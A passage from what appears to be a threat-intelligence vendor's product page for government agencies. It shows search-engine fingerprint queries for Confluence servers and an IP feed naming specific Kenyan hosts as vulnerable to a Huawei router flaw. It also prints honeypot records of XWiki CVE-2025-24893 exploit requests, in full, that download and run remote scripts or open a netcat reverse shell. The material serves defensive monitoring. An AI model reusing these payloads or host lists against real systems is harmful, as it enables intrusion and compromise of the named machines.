"header=\"Set-Cookie: JSESSIONID\" && header=\"X-Confluence-Request-Time\" && body=\"confluence-context-path\" && icon_hash=\"-305179312\""
],
"zoomEyeQueries": [
"https://www.zoomeye.ai/searchResult?q=aHR0cC5oZWFkZXI9IlNldC1Db29raWU6IEpTRVNTSU9OSUQiICYmIGh0dHAuaGVhZGVyPSJYLUNvbmZsdWVuY2UtUmVxdWVzdC1UaW1lIiAmJiBodHRwLmJvZHk9ImNvbmZsdWVuY2UtY29udGV4dC1wYXRoIiAmJiBpY29uaGFzaD0iLTMwNTE3OTMxMiI%3D"
],
"zoomEyeRawQueries": [
"http.header=\"Set-Cookie: JSESSIONID\" && http.header=\"X-Confluence-Request-Time\" && http.body=\"confluence-context-path\" && iconhash=\"-305179312\""
],
"shodanRawQueries": [
"+http.favicon.hash:-305179312 \"X-Confluence-Request-Time\" +\"Set-Cookie: JSESSIONID=\" +html:\"confluence-context-path\"",
"X-Confluence-Request-Time +\"JSESSIONID\" +html:\"atlassian-authentication-plugin\" -\"145DF9C4CDE560B2699212692B867CDA\"",
"X-Confluence-Request-Time +\"Set-Cookie: JSESSIONID\" +html:\"SAML POST Binding\""
],
"censysRawQueries": [
"host.services:(endpoints.http.favicons.hash_md5=\"966e60f8eb85b7ea43a7b0095f3e2336\" and banner:\"Set-Cookie: JSESSIONID\" and banner:\"X-Confluence-Request-Time\" and endpoints.http.body:\"confluence-context-path\")"
],
"censysLegacyRawQueries": [
"same_service(services.http.response.favicons.md5_hash=\"966e60f8eb85b7ea43a7b0095f3e2336\" and services.banner:\"Set-Cookie: JSESSIONID\" and services.banner:\"X-Confluence-Request-Time\" and services.http.response.body:\"confluence-context-path\")"
],
"cloneSSHURL": "git@git.vulncheck.com:vulncheck/initial-access.git"
}
],
"_timestamp": "2025-08-26T00:22:25.386422501Z"
}
]
IP Intelligence
IP Intelligence data on potentially vulnerable systems, attacker command & control infrastructure (C2), honeypots, proxies, and more.
- C2, webshells, open directories, implant detection, etc.
- 3 days (what's live right now), 10 days, 30 days, & 90 days
- For our Government partners, instead of just reporting we found implanted devices, we report how we detected the implants
GET /v3/index/ipintel-3d?id=initial-access&country=Kenya
[
{
"ip": "197.248.210.223",
"port": 3013,
"ssl": false,
"lastSeen": "2025-10-10T02:12:29.637398",
"asn": "AS37061",
"country": "Kenya",
"country_code": "KE",
"city": "Nairobi",
"cve": [
"CVE-2017-17215"
],
"matches": [
"Huawei EchoLife HG532 UPNP Command Injection"
],
"hostnames": [
"197-248-210-223.safaricombusiness.co.ke"
],
"type": {
"id": "initial-access",
"kind": "",
"finding": "potentially vulnerable"
},
"feed_ids": [
"ec6e3e94-a897-4152-8c16-74983e4a39fd"
],
"_timestamp": "2025-10-10T12:42:37.741942759Z"
},
{
"ip": "41.212.56.92",
"port": 20440,
"ssl": false,
"lastSeen": "2025-10-10T01:49:48.441992",
"asn": "AS15399",
"country": "Kenya",
"country_code": "KE",
"city": "Mombasa",
"cve": [
"CVE-2017-17215"
],
"matches": [
"Huawei EchoLife HG532 UPNP Command Injection"
],
"hostnames": [
"41.212.56.92.wananchi.com"
],
"type": {
"id": "initial-access",
"kind": "",
"finding": "potentially vulnerable"
},
"feed_ids": [
"ec6e3e94-a897-4152-8c16-74983e4a39fd"
],
"_timestamp": "2025-10-10T12:44:12.548104209Z"
},
{
"ip": "41.212.56.92",
"port": 46443,
"ssl": false,
"lastSeen": "2025-10-10T01:45:15.976491",
"asn": "AS15399",
"country": "Kenya",
"country_code": "KE",
"city": "Mombasa",
"cve": [
"CVE-2017-17215"
],
"matches": [
"Huawei EchoLife HG532 UPNP Command Injection"
],
"hostnames": [
"41.212.56.92.wananchi.com"
],
"type": {
"id": "initial-access",
"kind": "",
"finding": "potentially vulnerable"
},
"feed_ids": [
"ec6e3e94-a897-4152-8c16-74983e4a39fd"
],
"_timestamp": "2025-10-10T12:42:41.816303689Z"
}
]
Canary Intelligence
Canary Intelligence data on attempted and successful attempts at vulnerability exploitation in-the-wild.
- Providing early visibility into active threats targeting the Internet and critical infrastructure.
- Campaigns, and infrastructure, enabling meaningful attribution and intelligence production.
- Guide cyber operations, and maintain a decisive operational advantage.
GET /v3/index/vulncheck-canaries
[
{
"src_ip": "193.26.115.195",
"src_port": 47922,
"src_country": "US",
"dst_country": "BR",
"cve": "CVE-2025-24893",
"signature_id": 12700499,
"signature": "VULNCHECK XWiki CVE-2025-24893 Exploit Attempt (Groovy)",
"category": "Web Application Attack",
"severity": 1,
"payload": "R0VUIC94d2lraS9iaW4vZ2V0L01haW4vU29sclNlYXJjaD9tZWRpYT1yc3MmdGV4dD0lN0IlN0Jhc3luYyUyMGFzeW5jJTNEZmFsc2UlN0QlN0QlN0IlN0Jncm9vdnklN0QlN0QlNUIlMjdzaCUyNyUyQyUyMCUyNy1jJTI3JTJDJTIwJTI3d2dldCUyMC1xTy0lMjBodHRwJTNBJTJGJTJGNzQuMTk0LjE5MS41MiUyRnJvbmRvLnNkdS5zaCU3Q3NoJTI3JTVELmV4ZWN1dGUlMjglMjkudGV4dCU3QiU3QiUyRmdyb292eSU3RCU3RCU3QiU3QiUyRmFzeW5jJTdEJTdEIEhUVFAvMS4xDQpIb3N0OiBWQ19SRURBQ1RFRA0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKGJhbmcyMDEzQGF0b21pY21haWwuaW8pDQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXB0OiAqLyoNCg0K",
"http": {
"url": "/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%5B%27sh%27%2C%20%27-c%27%2C%20%27wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.sdu.sh%7Csh%27%5D.execute%28%29.text%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D",
"http_user_agent": "Mozilla/5.0 (bang2013@atomicmail.io)",
"protocol": "HTTP/1.1"
},
"timestamp": "2025-11-07T07:58:51.064Z"
},
{
"src_ip": "172.206.196.45",
"src_port": 51864,
"src_country": "US",
"dst_country": "CA",
"cve": "CVE-2025-24893",
"signature_id": 12700499,
"signature": "VULNCHECK XWiki CVE-2025-24893 Exploit Attempt (Groovy)",
"category": "Web Application Attack",
"severity": 1,
"payload": "R0VUIC9iaW4vZ2V0L01haW4vU29sclNlYXJjaD9tZWRpYT1yc3MmdGV4dD0lN2QlN2QlN2QlN2IlN2Jhc3luYyUyMGFzeW5jJTNkZmFsc2UlN2QlN2QlN2IlN2Jncm9vdnklN2QlN2RwcmludGxuKCUyMndnZXQlMjBodHRwOi8vOTAuMTU2LjIxOC4zMTo4MDgwL1ZreTBiNEo5SzMveDY0MCUyMC1PJTIwL3RtcC9mMWM1ZiUyMi5leGVjdXRlKCkudGV4dCklN2IlN2IlMmZncm9vdnklN2QlN2QlN2IlN2IlMmZhc3luYyU3ZCU3ZCUyMCBIVFRQLzEuMQ0KSG9zdDogVkNfUkVEQUNURUQNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChNYWNpbnRvc2g7IEludGVsIE1hYyBPUyBYIDEwXzE1XzcpIEFwcGxlV2ViS2l0LzYwNS4xLjE1IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi8xNi40LjEgU2FmYXJpLzYwNS4xLjE1DQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogZW4NCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo=",
"http": {
"url": "/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22wget%20http://90.156.218.31:8080/Vky0b4J9K3/x640%20-O%20/tmp/f1c5f%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d%20",
"http_user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4.1 Safari/605.1.15",
"protocol": "HTTP/1.1"
},
"timestamp": "2025-11-01T12:14:26.712Z"
},
{
"src_ip": "18.228.3.224",
"src_port": 37348,
"src_country": "BR",
"dst_country": "FR",
"cve": "CVE-2025-24893",
"signature_id": 12700499,
"signature": "VULNCHECK XWiki CVE-2025-24893 Exploit Attempt (Groovy)",
"category": "Web Application Attack",
"severity": 1,
"payload": "R0VUIC94d2lraS9iaW4vZ2V0L01haW4vU29sclNlYXJjaD9tZWRpYT1yc3MmdGV4dD0lN0QlN0QlN0IlN0Jhc3luYyUyMGFzeW5jJTNEZmFsc2UlN0QlN0QlN0IlN0Jncm9vdnklN0QlN0QlMjJidXN5Ym94JTIwbmMlMjAxOC4yMjguMy4yMjQlMjA4NDQzJTIwLWUlMjAvYmluL2Jhc2glMjIuZXhlY3V0ZSUyOCUyOSU3QiU3Qi9ncm9vdnklN0QlN0QlN0IlN0IvYXN5bmMlN0QlN0QgSFRUUC8xLjENCkhvc3Q6IFZDX1JFREFDVEVEDQpVc2VyLUFnZW50OiBweXRob24tcmVxdWVzdHMvMi4zMi40DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUsIHpzdGQNCkFjY2VwdDogKi8qDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg==",
"http": {
"url": "/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%22busybox%20nc%2018.228.3.224%208443%20-e%20/bin/bash%22.execute%28%29%7B%7B/groovy%7D%7D%7B%7B/async%7D%7D",
"http_user_agent": "python-requests/2.32.4",
"protocol": "HTTP/1.1"
},
"timestamp": "2025-10-31T10:16:30.275Z"
}
]
Partnering With Agencies
How VulnCheck Partners with Government Agencies
Government Use Cases
VulnCheck supports a wide variety of Government use cases.
- Vulnerability Intelligence
- Active Cyber Defense
- Mass Exploitation Defense
- Vulnerability Prioritization
- Adversary Cyber Intelligence
- Emerging Threat Response
See More with VulnCheck
VulnCheck works closely with government agencies to solidify defenses, collaborate, and respond to emerging threats.
- US Intelligence Community
- US Department of Defense
- Civilian Agencies
- National CERTs
- International Intelligence Agencies
- NATO and Friendly Allies
Ready to get Started?
Explore VulnCheck, a next-generation Cyber Threat Intelligence platform, which provides exploit and vulnerability intelligence to help you prioritize and remediate vulnerabilities that matter.
- Vulnerability PrioritizationPrioritize vulnerabilities that matter based on the threat landscape and defer vulnerabilities that don't.
- Early Warning SystemReal-time alerting of changes in the vulnerability landscape so that you can take action before the attacks start.